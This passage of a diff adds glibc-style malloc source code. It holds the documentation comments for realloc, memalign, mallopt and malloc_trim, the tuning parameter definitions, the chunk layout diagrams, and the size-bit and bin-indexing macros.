+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check if REQ overflows when padded and aligned and if the resulting value
+   is less than PTRDIFF_T.  Returns TRUE and the requested size or MINSIZE in
+   case the value is less than MINSIZE on SZ or false if any of the previous
+   check fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
